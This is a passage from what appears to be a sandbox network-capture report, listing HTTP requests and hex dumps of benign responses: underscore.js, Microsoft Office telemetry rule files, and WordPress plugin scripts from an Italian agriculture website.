                                                                                                                                          2024-11-28 10:33:09 UTC7876INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 6e 2c 72 29 7b 76 61 72 20 74 2c 65 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 72 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 75 6e 64 65 72 73 63 6f 72 65 22 2c 72 29 3a 28 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 6e 7c 7c 73 65 6c 66 2c 74 3d 6e 2e 5f 2c 28 65 3d 6e 2e
                                                                                                                                          Data Ascii: /*! This file is auto-generated */!function(n,r){var t,e;"object"==typeof exports&&"undefined"!=typeof module?module.exports=r():"function"==typeof define&&define.amd?define("underscore",r):(n="undefined"!=typeof globalThis?globalThis:n||self,t=n._,(e=n.
                                                                                                                                          2024-11-28 10:33:09 UTC8000INData Raw: 29 2c 45 3d 6c 6e 28 67 29 3b 66 75 6e 63 74 69 6f 6e 20 42 28 6e 2c 72 2c 74 2c 65 29 7b 69 66 28 65 3d 65 7c 7c 5b 5d 2c 72 7c 7c 30 3d 3d 3d 72 29 7b 69 66 28 72 3c 3d 30 29 72 65 74 75 72 6e 20 65 2e 63 6f 6e 63 61 74 28 6e 29 7d 65 6c 73 65 20 72 3d 31 2f 30 3b 66 6f 72 28 76 61 72 20 75 3d 65 2e 6c 65 6e 67 74 68 2c 6f 3d 30 2c 69 3d 67 28 6e 29 3b 6f 3c 69 3b 6f 2b 2b 29 7b 76 61 72 20 61 3d 6e 5b 6f 5d 3b 69 66 28 45 28 61 29 26 26 28 76 28 61 29 7c 7c 61 6e 28 61 29 29 29 69 66 28 31 3c 72 29 42 28 61 2c 72 2d 31 2c 74 2c 65 29 2c 75 3d 65 2e 6c 65 6e 67 74 68 3b 65 6c 73 65 20 66 6f 72 28 76 61 72 20 66 3d 30 2c 63 3d 61 2e 6c 65 6e 67 74 68 3b 66 3c 63 3b 29 65 5b 75 2b 2b 5d 3d 61 5b 66 2b 2b 5d 3b 65 6c 73 65 20 74 7c 7c 28 65 5b 75 2b 2b 5d
                                                                                                                                          Data Ascii: ),E=ln(g);function B(n,r,t,e){if(e=e||[],r||0===r){if(r<=0)return e.concat(n)}else r=1/0;for(var u=e.length,o=0,i=g(n);o<i;o++){var a=n[o];if(E(a)&&(v(a)||an(a)))if(1<r)B(a,r-1,t,e),u=e.length;else for(var f=0,c=a.length;f<c;)e[u++]=a[f++];else t||(e[u++]
                                                                                                                                          2024-11-28 10:33:09 UTC2957INData Raw: 2c 75 29 7b 66 75 6e 63 74 69 6f 6e 20 6f 28 29 7b 6c 3d 21 31 3d 3d 3d 75 2e 6c 65 61 64 69 6e 67 3f 30 3a 4f 28 29 2c 69 3d 6e 75 6c 6c 2c 63 3d 74 2e 61 70 70 6c 79 28 61 2c 66 29 2c 69 7c 7c 28 61 3d 66 3d 6e 75 6c 6c 29 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 29 7b 76 61 72 20 6e 3d 4f 28 29 2c 72 3d 28 6c 7c 7c 21 31 21 3d 3d 75 2e 6c 65 61 64 69 6e 67 7c 7c 28 6c 3d 6e 29 2c 65 2d 28 6e 2d 6c 29 29 3b 72 65 74 75 72 6e 20 61 3d 74 68 69 73 2c 66 3d 61 72 67 75 6d 65 6e 74 73 2c 72 3c 3d 30 7c 7c 65 3c 72 3f 28 69 26 26 28 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 69 29 2c 69 3d 6e 75 6c 6c 29 2c 6c 3d 6e 2c 63 3d 74 2e 61 70 70 6c 79 28 61 2c 66 29 2c 69 7c 7c 28 61 3d 66 3d 6e 75 6c 6c 29 29 3a 69 7c 7c 21 31 3d 3d 3d 75 2e 74 72 61 69 6c 69 6e 67 7c 7c
                                                                                                                                          Data Ascii: ,u){function o(){l=!1===u.leading?0:O(),i=null,c=t.apply(a,f),i||(a=f=null)}function n(){var n=O(),r=(l||!1!==u.leading||(l=n),e-(n-l));return a=this,f=arguments,r<=0||e<r?(i&&(clearTimeout(i),i=null),l=n,c=t.apply(a,f),i||(a=f=null)):i||!1===u.trailing||


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          100192.168.2.44986313.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:09 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:09 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:09 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 419
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                          ETag: "0x8DC582B9748630E"
                                                                                                                                          x-ms-request-id: 02716611-001e-00ad-7089-3f554b000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103309Z-174f7845968zgtf6hC1EWRqd8s0000000r6g000000007ds9
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:09 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          101192.168.2.44986713.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:09 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:10 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:10 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 468
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                          ETag: "0x8DC582B9C8E04C8"
                                                                                                                                          x-ms-request-id: f5817373-b01e-003e-3591-3f8e41000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103310Z-174f7845968psccphC1EWRuz9s0000000ygg000000006m2v
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:10 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          102192.168.2.44986513.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:09 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:10 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:10 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 472
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                          ETag: "0x8DC582B9DACDF62"
                                                                                                                                          x-ms-request-id: b18988de-c01e-0079-2891-3fe51a000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103310Z-174f7845968kdththC1EWRzvxn0000000as00000000010nx
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:10 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          103192.168.2.44986613.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:10 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:10 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:10 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 404
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                          ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                          x-ms-request-id: f5c4af5a-301e-005d-6385-3fe448000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103310Z-174f7845968n2hr8hC1EWR9cag0000000xyg000000004q6z
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:10 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          104192.168.2.4498695.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:10 UTC407OUTGET /wp-content/plugins/wpcf7-redirect/build/js/wpcf7r-fe.js?ver=1.1 HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:33:11 UTC315INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:10 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Mon, 11 Nov 2024 19:05:33 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 8074
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:33:10 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/javascript
                                                                                                                                          2024-11-28 10:33:11 UTC7877INData Raw: 76 61 72 20 77 70 63 66 37 5f 72 65 64 69 72 65 63 74 3b 0a 0a 28 66 75 6e 63 74 69 6f 6e 20 28 24 29 20 7b 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 57 70 63 66 37 5f 72 65 64 69 72 65 63 74 28 29 20 7b 0a 20 20 20 20 20 20 20 20 74 68 69 73 2e 69 6e 69 74 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 68 69 73 2e 77 70 63 66 37 5f 72 65 64 69 72 65 63 74 5f 6d 61 69 6c 73 65 6e 74 5f 68 61 6e 64 6c 65 72 28 29 3b 0a 20 20 20 20 20 20 20 20 7d 3b 0a 0a 20 20 20 20 20 20 20 20 74 68 69 73 2e 77 70 63 66 37 5f 72 65 64 69 72 65 63 74 5f 6d 61 69 6c 73 65 6e 74 5f 68 61 6e 64 6c 65 72 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76
                                                                                                                                          Data Ascii: var wpcf7_redirect;(function ($) { function Wpcf7_redirect() { this.init = function () { this.wpcf7_redirect_mailsent_handler(); }; this.wpcf7_redirect_mailsent_handler = function () { document.addEv
                                                                                                                                          2024-11-28 10:33:11 UTC197INData Raw: 20 20 20 20 20 7d 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 73 74 72 69 6e 67 2e 72 65 70 6c 61 63 65 28 2f 5c 26 5b 5c 77 5c 64 5c 23 5d 7b 32 2c 35 7d 5c 3b 2f 67 2c 20 66 75 6e 63 74 69 6f 6e 20 28 6d 29 20 7b 20 72 65 74 75 72 6e 20 6d 61 70 5b 6d 5d 3b 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 7d 3b 0a 0a 20 20 20 20 20 20 20 20 74 68 69 73 2e 69 6e 69 74 28 29 3b 0a 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 77 70 63 66 37 5f 72 65 64 69 72 65 63 74 20 3d 20 6e 65 77 20 57 70 63 66 37 5f 72 65 64 69 72 65 63 74 28 29 3b 0a 7d 29 28 6a 51 75 65 72 79 29 3b
                                                                                                                                          Data Ascii: }; return string.replace(/\&[\w\d\#]{2,5}\;/g, function (m) { return map[m]; }); }; this.init(); } wpcf7_redirect = new Wpcf7_redirect();})(jQuery);


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          105192.168.2.4498705.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:11 UTC591OUTGET /wp-content/plugins/tailor/assets/js/dist/frontend.min.js?ver=1.8.2 HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                          Referer: https://www.agriparadigma.it/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:33:11 UTC316INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:11 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Tue, 13 Mar 2018 12:53:50 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 28594
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:33:11 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/javascript
                                                                                                                                          2024-11-28 10:33:11 UTC7876INData Raw: 28 66 75 6e 63 74 69 6f 6e 20 65 28 74 2c 6e 2c 72 29 7b 66 75 6e 63 74 69 6f 6e 20 73 28 6f 2c 75 29 7b 69 66 28 21 6e 5b 6f 5d 29 7b 69 66 28 21 74 5b 6f 5d 29 7b 76 61 72 20 61 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 72 65 71 75 69 72 65 3b 69 66 28 21 75 26 26 61 29 72 65 74 75 72 6e 20 61 28 6f 2c 21 30 29 3b 69 66 28 69 29 72 65 74 75 72 6e 20 69 28 6f 2c 21 30 29 3b 76 61 72 20 66 3d 6e 65 77 20 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 66 69 6e 64 20 6d 6f 64 75 6c 65 20 27 22 2b 6f 2b 22 27 22 29 3b 74 68 72 6f 77 20 66 2e 63 6f 64 65 3d 22 4d 4f 44 55 4c 45 5f 4e 4f 54 5f 46 4f 55 4e 44 22 2c 66 7d 76 61 72 20 6c 3d 6e 5b 6f 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 74 5b 6f 5d 5b 30 5d 2e 63 61
                                                                                                                                          Data Ascii: (function e(t,n,r){function s(o,u){if(!n[o]){if(!t[o]){var a=typeof require=="function"&&require;if(!u&&a)return a(o,!0);if(i)return i(o,!0);var f=new Error("Cannot find module '"+o+"'");throw f.code="MODULE_NOT_FOUND",f}var l=n[o]={exports:{}};t[o][0].ca
                                                                                                                                          2024-11-28 10:33:11 UTC8000INData Raw: 43 68 69 6c 64 28 65 2c 63 69 64 2c 69 6e 64 65 78 2c 6f 6c 64 49 6e 64 65 78 29 7d 29 2e 6f 6e 28 22 6e 61 76 69 67 61 74 69 6f 6e 3a 72 65 6f 72 64 65 72 2e 22 2b 63 6f 6d 70 6f 6e 65 6e 74 2e 69 64 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 63 69 64 2c 69 6e 64 65 78 2c 6f 6c 64 49 6e 64 65 78 29 7b 63 6f 6d 70 6f 6e 65 6e 74 2e 6f 6e 52 65 6f 72 64 65 72 43 68 69 6c 64 28 65 2c 63 69 64 2c 69 6e 64 65 78 2c 6f 6c 64 49 6e 64 65 78 29 3b 63 6f 6d 70 6f 6e 65 6e 74 2e 6f 6e 52 65 6f 72 64 65 72 43 68 69 6c 64 28 65 2c 63 69 64 2c 69 6e 64 65 78 2c 6f 6c 64 49 6e 64 65 78 29 7d 29 3b 74 68 69 73 2e 24 65 6c 2e 6f 6e 28 22 62 65 66 6f 72 65 3a 65 6c 65 6d 65 6e 74 3a 63 68 69 6c 64 3a 72 65 66 72 65 73 68 2e 22 2b 63 6f 6d 70 6f 6e 65 6e 74 2e 69 64 2c 66 75 6e
                                                                                                                                          Data Ascii: Child(e,cid,index,oldIndex)}).on("navigation:reorder."+component.id,function(e,cid,index,oldIndex){component.onReorderChild(e,cid,index,oldIndex);component.onReorderChild(e,cid,index,oldIndex)});this.$el.on("before:element:child:refresh."+component.id,fun
                                                                                                                                          2024-11-28 10:33:11 UTC8000INData Raw: 65 28 7b 61 64 64 72 65 73 73 3a 6f 70 74 69 6f 6e 73 2e 61 64 64 72 65 73 73 7d 2c 66 75 6e 63 74 69 6f 6e 28 72 65 73 75 6c 74 73 2c 73 74 61 74 75 73 29 7b 69 66 28 67 6f 6f 67 6c 65 2e 6d 61 70 73 2e 47 65 6f 63 6f 64 65 72 53 74 61 74 75 73 2e 4f 4b 3d 3d 73 74 61 74 75 73 29 7b 64 65 66 65 72 72 65 64 2e 72 65 73 6f 6c 76 65 28 72 65 73 75 6c 74 73 5b 30 5d 2e 67 65 6f 6d 65 74 72 79 2e 6c 6f 63 61 74 69 6f 6e 29 7d 65 6c 73 65 20 69 66 28 6f 70 74 69 6f 6e 73 2e 6c 61 74 69 74 75 64 65 26 26 6f 70 74 69 6f 6e 73 2e 6c 6f 6e 67 69 74 75 64 65 29 7b 64 65 66 65 72 72 65 64 2e 72 65 73 6f 6c 76 65 28 6e 65 77 20 67 6f 6f 67 6c 65 2e 6d 61 70 73 2e 4c 61 74 4c 6e 67 28 6f 70 74 69 6f 6e 73 2e 6c 61 74 69 74 75 64 65 2c 6f 70 74 69 6f 6e 73 2e 6c 6f 6e
                                                                                                                                          Data Ascii: e({address:options.address},function(results,status){if(google.maps.GeocoderStatus.OK==status){deferred.resolve(results[0].geometry.location)}else if(options.latitude&&options.longitude){deferred.resolve(new google.maps.LatLng(options.latitude,options.lon
                                                                                                                                          2024-11-28 10:33:11 UTC4718INData Raw: 68 69 6c 64 56 69 65 77 2e 65 6c 2e 6e 65 78 74 53 69 62 6c 69 6e 67 29 7b 72 65 74 75 72 6e 7d 76 61 72 20 69 64 3d 63 68 69 6c 64 56 69 65 77 2e 65 6c 2e 6e 65 78 74 53 69 62 6c 69 6e 67 3f 63 68 69 6c 64 56 69 65 77 2e 65 6c 2e 6e 65 78 74 53 69 62 6c 69 6e 67 2e 69 64 3a 63 68 69 6c 64 56 69 65 77 2e 65 6c 2e 70 72 65 76 69 6f 75 73 53 69 62 6c 69 6e 67 2e 69 64 3b 63 68 69 6c 64 56 69 65 77 2e 24 65 6c 2e 72 65 6d 6f 76 65 28 29 3b 74 68 69 73 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 73 28 29 3b 74 68 69 73 2e 61 63 74 69 76 61 74 65 28 69 64 29 7d 7d 29 3b 24 2e 66 6e 2e 74 61 69 6c 6f 72 54 61 62 73 3d 66 75 6e 63 74 69 6f 6e 28 6f 70 74 69 6f 6e 73 2c 63 61 6c 6c 62 61 63 6b 73 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63
                                                                                                                                          Data Ascii: hildView.el.nextSibling){return}var id=childView.el.nextSibling?childView.el.nextSibling.id:childView.el.previousSibling.id;childView.$el.remove();this.querySelectors();this.activate(id)}});$.fn.tailorTabs=function(options,callbacks){return this.each(func


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          106192.168.2.44986813.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:11 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:11 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:11 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 428
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                          ETag: "0x8DC582BAC4F34CA"
                                                                                                                                          x-ms-request-id: b254496e-901e-0016-2991-3fefe9000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103311Z-174f7845968zgtf6hC1EWRqd8s0000000r9g000000003qdh
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
